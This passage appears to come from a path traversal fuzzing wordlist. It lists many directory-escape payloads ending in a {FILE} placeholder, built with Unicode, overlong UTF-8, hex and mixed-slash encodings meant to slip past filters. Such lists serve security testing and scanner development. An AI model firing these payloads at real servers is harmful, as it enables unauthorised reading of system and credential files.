"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
